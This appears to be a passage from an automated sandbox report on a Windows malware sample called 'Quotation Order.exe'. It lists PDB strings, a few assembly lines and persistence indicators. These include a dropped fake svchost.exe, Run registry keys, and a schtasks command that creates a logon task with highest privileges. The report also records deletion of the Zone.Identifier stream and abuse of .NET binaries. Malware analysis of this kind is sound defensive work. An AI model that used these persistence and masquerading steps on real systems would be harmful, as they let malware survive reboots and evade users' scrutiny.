                    Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbpdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: AddInProcess32.pdbpw source: avdfUcC.exe, 00000032.00000000.1504143602.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: svchost.exe, 0000000F.00000002.1524720197.00000153D8F75000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Drawing.ni.pdbRSDS source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Core.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Management.pdb source: WER46C7.tmp.dmp.46.dr
                    Source: Binary string: mscorlib.pdb` source: WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini\??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: svchost.exe, 0000000F.00000002.1480472904.00000153BE8AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb} source: svchost.exe, 0000000F.00000002.1480472904.00000153BE8AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb source: WER2499.tmp.dmp.32.dr
                    Source: Binary string: pC:\Users\user\AppData\Roaming\svchost.PDB source: svchost.exe, 0000000F.00000002.1472717791.000000458E6F3000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: fic.pdbn source: svchost.exe, 0000000F.00000002.1524720197.00000153D8F75000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Microsoft.VisualBasic.pdb` source: WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbCon source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F97000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Windows.Forms.pdbH source: WER1C4C.tmp.dmp.35.dr
                    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 0000000F.00000002.1524720197.00000153D8F75000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdbRSDS source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: C:\Users\user\AppData\Roaming\svchost.PDB source: svchost.exe, 0000000F.00000002.1472717791.000000458E6F3000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\mscorlib.pdbpdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F97000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Management.pdb#( source: WER2499.tmp.dmp.32.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbmeerCo source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb@ source: WER1C4C.tmp.dmp.35.dr
                    Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Windows.Forms.pdbpHj! source: WER46C7.tmp.dmp.46.dr
                    Source: Binary string: System.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Windows.Forms.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: mscorlib.pdb" source: WER1C4C.tmp.dmp.35.dr
                    Source: Binary string: AddInProcess32.pdb source: avdfUcC.exe, 00000032.00000000.1504143602.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: mscorlib.pdb source: svchost.exe, 0000000F.00000002.1481132072.00000153BE8F2000.00000004.00000020.00020000.00000000.sdmp, WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Object InvokeMethod(System.Object, System.Object[], System.Signature, Boolean)\??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 0000000F.00000002.1525069832.00000153D8F99000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Management.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Drawing.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Management.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: caspol.pdb source: avdfUcC.exe.31.dr
                    Source: Binary string: System.Core.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbxko source: svchost.exe, 0000000F.00000002.1481132072.00000153BE8F2000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: svchost.PDB source: svchost.exe, 0000000F.00000002.1472717791.000000458E6F3000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdb source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WER1C4C.tmp.dmp.35.dr, WER46C7.tmp.dmp.46.dr, WER2499.tmp.dmp.32.dr
                    Source: Quotation Order.exe Static PE information: 0xB06BE3BE [Wed Oct 17 15:31:10 2063 UTC]
                    Source: C:\Users\user\Desktop\Quotation Order.exe Code function: 0_2_00007FF7C19CD1BD push ecx; iretd 0_2_00007FF7C19CD35C
                    Source: C:\Users\user\Desktop\Quotation Order.exe Code function: 0_2_00007FF7C19C5165 push FFFFFF92h; ret 0_2_00007FF7C19C5176
                    Source: C:\Users\user\Desktop\Quotation Order.exe Code function: 0_2_00007FF7C1AA0002 push esp; retf 4810h 0_2_00007FF7C1AA0312
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 15_2_00007FF7C19BD1BD push ecx; iretd 15_2_00007FF7C19BD35C
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 15_2_00007FF7C19B5165 push FFFFFF92h; ret 15_2_00007FF7C19B5176
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 15_2_00007FF7C1A9026B push esp; retf 4810h 15_2_00007FF7C1A90312
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 17_2_00007FF7C198D1BD push ecx; iretd 17_2_00007FF7C198D35C
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 17_2_00007FF7C1985165 push FFFFFF92h; ret 17_2_00007FF7C1985176
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 17_2_00007FF7C1A6026B push esp; retf 4810h 17_2_00007FF7C1A60312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 26_2_06495BE0 push es; ret 26_2_06495BF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 26_2_069A11B0 push es; ret 26_2_069A11C0
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 38_2_00007FF7C19AD1BD push ecx; iretd 38_2_00007FF7C19AD35C
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 38_2_00007FF7C19A5165 push FFFFFF92h; ret 38_2_00007FF7C19A5176
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 38_2_00007FF7C1A8026B push esp; retf 4810h 38_2_00007FF7C1A80312
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 52_2_00007FF7C191D1BD push ecx; iretd 52_2_00007FF7C191D35C
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 52_2_00007FF7C1915165 push FFFFFF92h; ret 52_2_00007FF7C1915176
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 52_2_00007FF7C19F026B push esp; retf 4810h 52_2_00007FF7C19F0312

                    Persistence and Installation Behavior

                    Source: C:\Users\user\Desktop\Quotation Order.exe File created: C:\Users\user\AppData\Roaming\svchost.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File created: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\Quotation Order.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run avdfUcC
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe:Zone.Identifier read attributes | delete
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe:Zone.Identifier read attributes | delete
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\Quotation Order.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
